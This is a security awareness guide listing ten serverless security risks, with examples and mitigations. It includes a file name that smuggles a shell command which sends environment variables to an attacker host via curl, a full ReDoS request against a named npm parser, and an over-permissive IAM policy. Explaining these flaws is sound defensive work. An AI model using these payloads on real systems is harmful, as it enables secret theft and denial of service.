Home

Awesome

The Ten Most Critical Risks for Serverless Applications v1.0

Preface

The “Serverless architectures Security Top 10” document is meant to serve as a security awareness and education guide. The document is curated and maintained by top industry practitioners and security researchers with vast experience in application security, cloud and serverless architectures.

As many organizations are still exploring serverless architectures, or just making their first steps in the serverless world, we believe that this guide is critical for their success in building robust, secure and reliable applications.

We urge all organizations to adopt this document and use it during the process of designing, developing and testing serverless applications in order to minimize security risks.

This document will be maintained and enhanced periodically based on input from the community, as well as research and analysis of the most common serverless architecture risks.

Lastly, it should be stressed that this document enumerates what are believed to be the current top risks, specific to serverless architectures. Readers are encouraged to always follow secure software design and development best practices.

Serverless Security Overview

Serverless architectures (also referred to as “FaaS” - Function as a Service) enable organizations to build and deploy software and services without maintaining or provisioning any physical or virtual servers. Applications built using serverless architectures are suitable for a wide range of services, and can scale elastically as cloud workloads grow.

From a software development perspective, organizations adopting serverless architectures can focus on core product functionality, and completely disregard the underlying operating system, application server or software runtime environment.

By developing applications using serverless architectures, you relieve yourself from the daunting task of constantly applying security patches for the underlying operating system and application servers – these tasks are now the responsibility of the serverless architecture provider.

The following image, demonstrates the shared security responsibilities model, adapted to serverless architectures

Shared security responsibility model

In serverless architectures, the serverless provider is responsible for securing the data center, network, servers, operating systems and their configurations. However, application logic, code, data and application-layer configurations still need to be robust and resilient to attacks, which is the responsibility of application owners.

The comfort and elegance of serverless architectures is not without its drawbacks - serverless architectures introduce a new set of issues that must be taken into consideration when securing such applications:

Top 10

Before diving into the serverless Architectures Security Top 10 list, it should be emphasized that the primary goal of this document is to provide assistance and education for organizations looking to adopt serverless. While the document provides information about what are believed to be the most prominent security risks for serverless architectures, it is by no means an exhaustive list. Readers are encouraged to follow other industry standards related to secure software design and development.

The data and research for this document is based on the following data sources:

The list is organized in order of criticality from SAS-1…10, where SAS-1 indicates the most critical risk, and SAS-10 the least critical risk.

SAS-1: Function Event-Data Injection

Injection flaws in applications are one of the most common risks to date and have been thoroughly covered in many secure coding best practice guides as well as in the OWASP Top 10 project. At a high level, injection flaws occur when untrusted input is passed directly to an interpreter and eventually gets executed or evaluated.

In the context of serverless architectures however, function event-data injections are not strictly limited to direct user input, such as input from a web API call. Most serverless architectures provide a multitude of event sources, which can trigger the execution of a serverless function. For example:

Serverless functions can consume input from each type of event source, and such event input might include different message formats, depending on the type of event and its source. The various parts of these event messages can contain attacker-controlled or otherwise dangerous inputs.

This rich set of event sources increases the potential attack surface and introduces complexities when attempting to protect serverless functions against event-data injections, especially since serverless architectures are not nearly as well-understood as web environments where developers know which message parts shouldn’t be trusted (e.g. GET/POST parameters, HTTP headers, and so forth).

The most common types of injection flaws in serverless architectures are presented below (in no particular order):

As an example, consider a job candidate CV filtering system, which receives emails with candidate CVs attached as PDF files. The system transforms the PDF file into text in order to perform text analytics. The transformation of the PDF file into text is done using a command line utility (pdftotext):

def index(event, context):
    for record in event['Records']:
        sns_message = json.loads(record['Sns']['Message'])
        raw_email = sns_message['content']
        parser = email.message_from_string(raw_email)
        if parser.is_multipart():
            for email_msg in parser.get_payload():
                file_name = email_msg.get_filename()
                if not file_name:
                    continue
                if not file_name.endswith('.pdf'):
                    continue

                # export pdf attachment to /tmp
                pdf_file_path = os.path.join('/tmp', file_name)
                with open(pdf_file_path, "wb") as pdf_file:
                    pdf_file.write(email_msg.get_payload(decode=True))

                # extract text from pdf file
                cmd = "/var/task/lib/pdftotext {} -".format(pdf_file_path)

                pdf_content = subprocess.check_output(cmd, shell=True)

The developer of this serverless function assumes that users will provide legitimate PDF file names and does not perform any kind of sanity check on the incoming file name, except for the rudimentary check to make sure the file's extension is indeed '.pdf'. The file name is embedded directly into the shell command. This weakness allows a malicious user to inject shell commands as part of the PDF file name. For example, the following PDF file name, will leak all environment variables of the currently executing function:

foobar;env|curl -H "Content-Type: text/plain" -X POST -d @- http://attacker.site/collector #.pdf

COMPARISON

DIFFERENTIATING FACTORTRADITIONAL APPLICATIONSSERVERLESS APPLICATIONS
Input sources and attack surface for injection-based vulnerabilitiesSmall set of input sources - injection-based attacks are thoroughly understoodWide range of event triggers which provide a rich set of input sources and data formats. Injection-based attacks can be mounted in unexpected locations, many of which have yet to be studied properly
Injection-based attack surface complexityDevelopers, architects and security practitioners are well versed in relevant attack surfaces related to injection-based vulnerabilities. For example - “HTTP GET/POST parameters or headers should never be trusted”Serverless is still new, many developers, architects and security practitioners still don’t have the required expertise to understand the different attack vectors related to injection-based attacks
Security testing for Injection-based attacksExisting security testing solutions (DAST, SAST, IAST) provide good coverage for detecting injection-based vulnerabilitiesCurrent DAST/SAST/IAST security testing tools are not adapted for testing injection-based vulnerabilities in serverless functions
Protections against Injection-based attacksTraditional security protections (Firewalls, IPS, WAF, RASP) provide suitable protection coverage for injection-based attacksTraditional security protections are not suitable for detecting and preventing injection-based attacks in serverless functions

MITIGATION

SAS-2: Broken Authentication

Since serverless architectures promote a microservices-oriented system design, applications built for such architectures may oftentimes contain dozens or even hundreds of distinct serverless functions, each with its own specific purpose.

These functions are weaved together and orchestrated to form the overall system logic. Some serverless functions may expose public web APIs, while others may serve as some sort of an internal glue between processes or other functions. In addition, some functions may consume events of different source types, such as cloud storage events, NoSQL database events, IoT device telemetry signals or even SMS message notifications.

Applying robust authentication schemes, which provide access control and protection to all relevant functions, event types and triggers is a complex undertaking, which may easily go awry if not done carefully.

As an example, imagine a serverless application, which exposes a set of public APIs, all of which enforce proper authentication. At the other end of the system, the application reads files from a cloud storage service, where file contents are consumed as input to certain serverless functions. If proper authentication is not applied on the cloud storage service, the system is exposing an unauthenticated rogue entry point, which was not taken into consideration during system design.

A weak authentication implementation might enable an attacker to bypass application logic and manipulate its flow, potentially executing functions and performing actions that were not supposed to be exposed to unauthenticated users.

COMPARISON

DIFFERENTIATING FACTORTRADITIONAL APPLICATIONSSERVERLESS APPLICATIONS
Components requiring authenticationAuthentication is applied using a single authentication provider on an entire domain/app. Simple to apply proper authenticationIn many scenarios, each serverless function acts as a nano-service which requires its own authentication. Moreover, cloud services that are used by the serverless application also require their own authentication. As a result, the complexity of applying proper authentication grows tremendously.
Number of unique authentication schemes requiredSingle and consistent authentication scheme is applied to the entire applicationServerless applications that rely on multiple cloud services as event triggers, sometimes require different authentication schemes per each cloud service
Tools for testing broken authenticationWide range of brute force authentication tools exist for testing web environmentsLack of proper tools for testing serverless authentications

MITIGATION

It is not recommended for developers to build their own authentication schemes, but rather use authentication facilities provided by the serverless environment, or by the relevant runtime. For example:

In scenarios where interactive user authentication is not an option, such as with APIs, developers should use secure API keys, SAML assertions, Client-Side Certificates or similar methods of authentication standards.

If you are building an IoT ecosystem that uses Pub/Sub messaging for telemetry data or OTA firmware updates, pay attention to the following best practices:

In addition, organizations should use continuous security health check facilities that are provided by their serverless cloud provider, to monitor correct permissions and assess them against their corporate security policy:

Microsoft Azure provides similar capabilities through its security health monitoring facility, which is available in Azure Security Center.

SAS-3: Insecure Serverless Deployment Configuration

Cloud services in general, and serverless architectures in particular offer many customizations and configuration settings in order to adapt them for each specific need, task or surrounding environment. Some of these configuration settings have critical implications on the overall security posture of the application and should be given attention. The default settings provided by serverless architecture vendors might not always be suitable for your needs.

One extremely common weakness that affects many applications that use cloud-based storage is incorrectly configured cloud storage authentication/authorization.

Since one of the recommended best practice designs for serverless architectures is to make functions stateless, many applications built for serverless architectures rely on cloud storage infrastructure to store and persist data between executions.

In recent years, we have witnessed numerous incidents of insecure cloud storage configurations, which ended up exposing sensitive confidential corporate information to unauthorized users. To make things worse, in several cases, the sensitive data was also indexed by public search engines, making it easily available for everyone.

COMPARISON

DIFFERENTIATING FACTORTRADITIONAL APPLICATIONSSERVERLESS APPLICATIONS
Number of Internet-facing services requiring robust deployment configurationsLimited number of internet facing interfaces that require secure deployment configurationEach cloud service and serverless function requires its own secure deployment configuration
Best Practices for applying robust deployment configurationsWell known and thoroughly understood, especially for mainstream development frameworksVendor documentation and best practices exist. Industry standards and public guides on how to secure serverless environments is scarce
Automated tools for detecting insecure configurationsPlenty of open source and commercial scanners will pinpoint insecure deployment configurationsLimited set of tools for scanning and building secure serverless applications and deploying them securely

MITIGATION

In order to avoid sensitive data leakage from cloud storage infrastructure, many vendors now offer hardened cloud storage configurations, multi-factor authentication and encryption of data in transit and at rest. Organizations which make use of cloud storage, should get familiar with the available storage security controls provided by their cloud vendor.

Here is a short list of relevant articles and guides on this topic:

In addition, we encourage organizations to make use of encryption key management service when encrypting data in cloud environments. Such services help with the secure creation and maintenance of encryption keys, and usually offer simple integrations with serverless architectures.

We recommend that your organization’s development and DevOps teams be well-versed in the different security-related configuration settings provided by your serverless architecture vendor, and will make you aware of these settings as much as possible.

Organizations should also apply continuous security configuration health monitoring, as described in the Mitigations section of SAS-2 in order to make sure that their environment is secured and follows corporate security policies.

SAS-4: Over-Privileged Function Permissions and Roles

Serverless applications should always follow the principle of "least privilege". This means that a serverless function should be given only those privileges, which are essential in order to perform its intended logic.

As an example, consider the following AWS Lambda function, which receives data, and stores it in a DynamoDB table, using the DynamoDB put_item() method:

# ...
# store pdf content in DynamoDB table
dynamodb_client.put_item(TableName=TABLE_NAME,
                            Item={"email": {"S": parser['From']},
                                "subject": {"S": parser['Subject']},
                                "received": {"S": str(datetime.utcnow()).split('.')[0]},
                                "filename": {"S": file_name},
                                "requestid": {'S': context.aws_request_id},
                                "content": {'S': pdf_content.decode("utf-8")}})
# ...

While the function only puts items into the database, the developer made a mistake and assigned an over-permissive IAM role to the function, which can be seen in the following 'serverless.yml' file:

- Effect: Allow
  Action:
    - 'dynamodb:*'
  Resource:
    - 'arn:aws:dynamodb:us-east-1:****************:table/TABLE_NAME'

The appropriate, least-privileged role, should have been:

- Effect: Allow
  Action:
    - dynamodb:PutItem
  Resource: 'arn:aws:dynamodb:us-east-1:****************:table/TABLE_NAME'

Since serverless functions usually follow microservices concepts, many serverless applications contain dozens, hundreds or even thousands of functions. This in turn means that managing function permissions and roles quickly becomes a tedious task. In such scenarios, some organizations might find themselves forced to use a single permission model or security role for all functions, essentially granting each of them full access to all other components in the system.

In a system where all functions share the same set of over-privileged permissions, a vulnerability in a single function can eventually escalate into a system-wide security catastrophe.

COMPARISON

DIFFERENTIATING FACTORTRADITIONAL APPLICATIONSSERVERLESS APPLICATIONS
IAM, permissions and roles complexitySimple to create and maintain - mostly applies to user roles rather than software componentsDepending on the serverless vendor - might be more sophisticated or complex. Each serverless function should run with its own role and permission policy in order to reduce "blast radius"

MITIGATION

In order to contain a potential attack's "blast radius", it is recommended to apply Identity and Access Management (IAM) capabilities relevant to your platform, and make sure that each function has its own user-role, and that it runs with the least amount of privileges required to perform its task properly.

Here are some relevant resources on this topic:

SAS-5: Inadequate Function Monitoring and Logging

Every cyber “intrusion kill chain” usually commences with a reconnaissance phase – this is the point in time in which attackers scout the application for weaknesses and potential vulnerabilities, which may later be used to exploit the system. Looking back at major successful cyber breaches, one key element that was always an advantage for the attackers, was the lack of real-time incident response, which was caused by failure to detect early signals of an attack. Many successful attacks could have been prevented if victim organizations had efficient and adequate real-time security event monitoring and logging.

One of the key aspects of serverless architectures is the fact that they reside in a cloud environment, outside of the organizational data center perimeter. As such, “on premise” or host-based security controls become irrelevant as a viable protection solution. This in turn, means that any processes, tools and procedures developed for security event monitoring and logging, becomes inapt.

While many serverless architecture vendors provide extremely capable logging facilities, these logs in their basic/out-of-the-box configuration, are not always suitable for the purpose of providing a full security event audit trail. In order to achieve adequate real-time security event monitoring with proper audit trail, serverless developers and their DevOps teams are required to stitch together logging logic that will fit their organizational needs, for example: Collect real time logs from the different serverless functions and cloud services Push these logs to a remote security information and event management (SIEM) system. This will often require the logs to be stored first in an intermediary cloud storage service.

The SANS six categories of critical log information paper (link), recommends that the following log reports be collected:

COMPARISON

DIFFERENTIATING FACTORTRADITIONAL APPLICATIONSSERVERLESS APPLICATIONS
Available security logsMany traditional security protections offer rich security event logs and integrations with SIEM products or log analysis toolsSince traditional security protections are irrelevant for serverless architectures, organizations can only rely on cloud provider’s logs, or build their own logging capabilities
Best Practices for applying proper security loggingWide range of documentation and best practice guides exist (e.g. SANS "The 6 Categories of Critical Log Information")Most guides and documentation are provided by cloud vendors. Not many serverless-specific best practices security logging guides exist
Availability and maturity of log management and analysis toolsTraditional application logs have a wide range of log management and analysis tools and a mature industry behind it.Cloud security log management and analysis tools are still rather new. Serverless function-level log analysis tools are still not widely adopted
Application layer monitoring & analysisAnalyzing interactions between different application components can be done using a debugger/tracing utilityUnderstanding the interactions inside serverless-based applications might be overwhelming, especially in light of missing proper visualization tools for some environments

MITIGATION

Organizations adopting serverless architectures, are encouraged to augment log reports with serverless-specific information such as:

Additional information can be found in the following reference links:

Organizations are also encouraged to adopt serverless application logic/code runtime tracing and debugging facilities in order to gain better understanding of the overall system and data flow. For example:

SAS-6: Insecure 3rd Party Dependencies

In the general case, a serverless function should be a small piece of code that performs a single discrete task. Oftentimes, in order to perform this task, the serverless function will be required to depend on third party software packages, open source libraries and even consume 3rd party remote web services through API calls.

Keep in mind that even the most secure serverless function can become vulnerable when importing code from a vulnerable 3rd party dependency.

In recent years, many white papers and surveys were published on the topic of insecure 3rd party packages. A quick search in the MITRE CVE (Common Vulnerabilities and Exposures) database or similar projects demonstrates just how prevalent are vulnerabilities in packages and modules which are often used when developing serverless functions. For example: Known vulnerabilities in Node.js modules (link) Known vulnerabilities in Java technologies (link) Known vulnerabilities in Python related technologies (link)

The OWASP Top 10 project also includes a section on the use of components with known vulnerabilities.

COMPARISON

No major differences

MITIGATION

Dealing with vulnerabilities in 3rd party components requires a well-defined process which includes:

SAS-7: Insecure Application Secrets Storage

As applications grow in size and complexity, there is a need to store and maintain "application secrets" – for example:

Another common mistake is to store these secrets in plain text, as environment variables. While environment variables are a useful way to persist data across serverless function executions, in some cases, such environment variables can leak and reach the wrong hands.

COMPARISON

DIFFERENTIATING FACTORTRADITIONAL APPLICATIONSSERVERLESS APPLICATIONS
Ease of storing secretsIn traditional applications, secrets can be stored in a single centralized configuration file (encrypted of course) or databaseIn serverless applications, each function is packaged separately. A single centralized configuration file cannot be used. This leads developers to use “creative” approaches like using environment variables, which if used insecurely, may leak information
Access control to sensitive dataIt’s quite easy to apply proper access controls on sensitive data by using RBAC. For example - the person deploying the application is not exposed to application secretsIf secrets are stored using environment variables - it’s most likely that the people who deploy the application will have permissions to access the sensitive data
Use of key management systemsOrganizations and InfoSec teams are used to working with corporate KMI systemsMany developers and InfoSec teams have yet to gain enough knowledge and experience with cloud based key management services

MITIGATION

It is critical that all application secrets will be stored in secure encrypted storage and that encryption keys be maintained via a centralized encryption key management infrastructure or service. Such services are offered by most serverless architecture and cloud vendors, who also provide developers with secure APIs that can easily and seamlessly integrate into serverless environments.

If you decide to persist secrets in environment variables, make sure that data is always encrypted, and that decryption only takes place during function execution, using proper encryption key management.

Here are several reference links:

SAS-8: Denial of Service & Financial Resource Exhaustion

During the past decade, we have seen a dramatic increase in the frequency and volume of Denial of Service (DoS) attacks. Such attacks became one of the primary risks facing almost every company exposed to the Internet.

In 2016, a distributed Denial of Service (DDoS) attack reached a peak of one Terabit per second (1 Tbps). The attack supposedly originated from a Bot-Net made of millions of infected IoT devices.

While serverless architectures bring a promise of automated scalability and high availability, they do impose some limitations and issues which require attention.

As an example, in March 2018, PureSec's threat research team released a security advisory for a Node NPM package named 'AWS-Lambda-Multipart-Parser', which was found to be vulnerable to a ReDoS (Regular-Expression Denial of Service) attack vector. The vulnerability enables a malicious user to cause each AWS Lambda function which uses it to stall until it times out.

Sample Node.js (taken from AWS-Lambda-Multipart-Parser) code that is vulnerable to ReDoS:

module.exports.parse = (event, spotText) => {
    const boundary = getValueIgnoringKeyCase(event.headers, 'Content-Type').split('=')[1];
    const body = (event.isBase64Encoded ? Buffer.from(event.body, 'base64').toString('binary') : event.body)
        .split(new RegExp(boundary))
        .filter(item => item.match(/Content-Disposition/))
  1. The 'boundary' string sent by the client is extracted from the Content-Type header.
  2. The request's body is split based on the boundary string. Splitting of the body string is done using the JavaScript string split() method, which accepts either a string or a regular expression as the delimiter for splitting the string.
  3. The developer of the package chose to turn the boundary string into a regular expression object by calling the RegExp() constructor and using it inside the body’s split() method.
  4. Since both the boundary string, as well as the body of the request are under the full control of the client, a malicious user can craft a multipart/form-data request, in a way that will cause a ReDoS attack to occur.

An example of such a malicious request is presented below:

POST /app HTTP/1.1
Host: xxxxxxxxxxx.execute-api.us-east-1.amazonaws.com
Content-Length: 327
Content-Type: multipart/form-data; boundary=(.+)+$
Connection: keep-alive

(.+)+$
Content-Disposition: form-data; name="text"

PureSec
(.+)+$
Content-Disposition: form-data; name="file1"; filename="a.txt"
Content-Type: text/plain

Content of a.txt.

(.+)+$
Content-Disposition: form-data; name="file2"; filename="a.html"
Content-Type: text/html

<!DOCTYPE html><title>Content of a.html.</title>

(.+)+$

In this example, the boundary string was chosen to be the extremely inefficient regular expression (.+)+$. This boundary string, with a simple request body as the one provided above, will cause a 100% CPU utilization for a very long period of time. In fact, on a MacBook Pro, with a 3.5Ghz Intel Core i7 CPU, the Node process did not finish parsing the body, even after 10 minutes(!) of running. When testing against an AWS Lambda function which uses this node package, the function always hit the maximum time out allowed by the platform.

An attacker may send numerous concurrent malicious requests to an AWS Lambda function which uses this package, until the concurrent executions limit is reached, and in turn, deny other users access to the application. An attacker may also push the Lambda function to “over-execute” for long periods of time, essentially inflating the monthly bill and inflicting a financial loss for the target organization.

More details are available in the PureSec blog

Serverless resource exhaustion: most serverless architecture vendors define default limits on the execution of serverless functions such as:

Depending on the type of limit and activity, poorly designed or configured applications may be abused in such a way that will eventually cause latency to become unacceptable or even render it unusable for other users.

AWS VPC IP address depletion: organizations that deploy AWS Lambda functions in VPC (Virtual Private Cloud) environments should also pay attention to the potential exhaustion of IP addresses in the VPC subnet. An attacker might cause a denial of service scenario by forcing more and more function instances to execute, and deplete the VPC subnet from available IP addresses.

Financial Resource Exhaustion: an attacker may push the serverless application to “over-execute” for long periods of time, essentially inflating the monthly bill and inflicting a financial loss for the target organization.

COMPARISON

DIFFERENTIATING FACTORTRADITIONAL APPLICATIONSSERVERLESS APPLICATIONS
Automatic scalabilityScalability is cumbersome and requires careful pre-planningServerless environments are provisioned automatically, on-demand. This means they can withstand high bandwidth attacks without any downtime
Execution limitsStandard network, disk and memory limitsIn order to avoid excessive billing or to inflict damage on other tenants sharing the infrastructure, serverless applications use execution limits. Attackers may attempt to hit these limits and saturate the system
IP address depletionN/AWhen running AWS Lambda in VPCs, organizations should make sure they have enough IP addresses in the VPC subnet

MITIGATION

There are several mitigations and best practices approaches for dealing with Denial of Service and Denial of Wallet attacks against serverless architectures. For example:

SAS-9: Functions Execution Flow Manipulation

Manipulation of application flow may help attackers to subvert application logic. Using this technique, an attacker may sometimes bypass access controls, elevate user privileges or even mount a Denial of Service attack.

Application flow manipulation is not unique for serverless architectures – it is a common problem in many types of software. However, serverless applications are unique, as they oftentimes follow the microservices design paradigm and contain many discrete functions, chained together in a specific order which implements the overall application logic.

In a system where multiple functions exist, and each function may invoke another function, the order of invocation might be critical for achieving the desired logic. Moreover, the design might assume that certain functions are only invoked under specific scenarios and only by authorized invokers.

Another relevant scenario, in which multiple functions invocation process might become a target for attackers, are serverless-based state-machines, such as those offered by AWS Step Functions, Azure Logic Apps, Azure Durable Functions or IBM Cloud Functions Sequences.

Let’s examine the following serverless application, which calculates a cryptographic hash for files that are uploaded into a cloud storage bucket. The application logic is as follows:

The following image presents a schematic workflow of the application described above: SAS 9 Example

This system design assumes that functions and events are invoked in the desired order – however, a malicious user might be able to manipulate the system in a couple of ways:

  1. If the cloud storage bucket does not enforce proper access controls, any user might be able to upload files directly into the bucket, bypassing the size sanity check, which is only enforced in Step 3. A malicious user might upload numerous huge files, essentially consuming all available system resources as defined by the system’s quota

  2. If the Pub/Sub messaging system does not enforce proper access controls on the relevant topic, any user might be able to publish numerous “file uploaded” messages, forcing the system to continuously execute the cryptographic file hashing function until all system resources are consumed

In both cases, an attacker might consume system resources until the defined quota is met, and then deny service from other system users. Another possible outcome can be a painful inflated monthly bill from the serverless architecture cloud vendor (also known as “Financial Resource Exhaustion”).

COMPARISON

DIFFERENTIATING FACTORTRADITIONAL APPLICATIONSSERVERLESS APPLICATIONS
Flow is enforced on...Depending on the application type. Could be user flow, web page flow, business logic flowSimilar to traditional applications (depending on the front-end), however, serverless functions may also require flow enforcement - especially in applications mimicking state machines using functions

MITIGATION

There is no simple one-size-fits-all solution for this issue. The most robust approach for avoiding function execution flow manipulations is to design the system without making any assumptions about legitimate invocation flow. Make sure that proper access controls and permissions are set for each function, and where applicable, use a robust application state management facility.

SAS-10: Improper Exception Handling and Verbose Error Messages

At the time of writing, the available options for performing line-by-line debugging of serverless based applications is rather limited and more complex compared to the debugging capabilities that are available when developing standard applications. This is especially true in cases where the serverless function is using cloud-based services that are not available when debugging the code locally.

This factor forces some developers to adopt the use of verbose error messages, enable debugging environment variables and eventually forget to clean the code when moving it to the production environment.

Verbose error messages such as stack traces or syntax errors, which are exposed to end users, may reveal details about the internal logic of the serverless function, and in turn reveal potential weaknesses, flaws or even leak sensitive data.

COMPARISON

DIFFERENTIATING FACTORTRADITIONAL APPLICATIONSSERVERLESS APPLICATIONS
Ease of debugging and tracingEasy to debug applications using a standard debugger or IDE tracing capabilitiesAt the time of writing, debugging serverless applications is still more complex than traditional applications. Some developers might get tempted to use verbose error messages and debug prints

MITIGATION

Developers are encouraged to use debugging facilities provided by their serverless architecture and avoid verbose debug printing as a mean to debug software.

In addition, if your serverless environment supports defining custom error responses, such as those provided by API gateways, we recommend that you create simple error messages that do not reveal any details about the internal implementation or any environment variables.

ACKNOWLEDGEMENTS

The following PureSec contributors were involved in the preparation of this document:

PureSec would like to thank the following individuals and organizations for reviewing the document and providing their valuable insights and comments (in alphabetical order):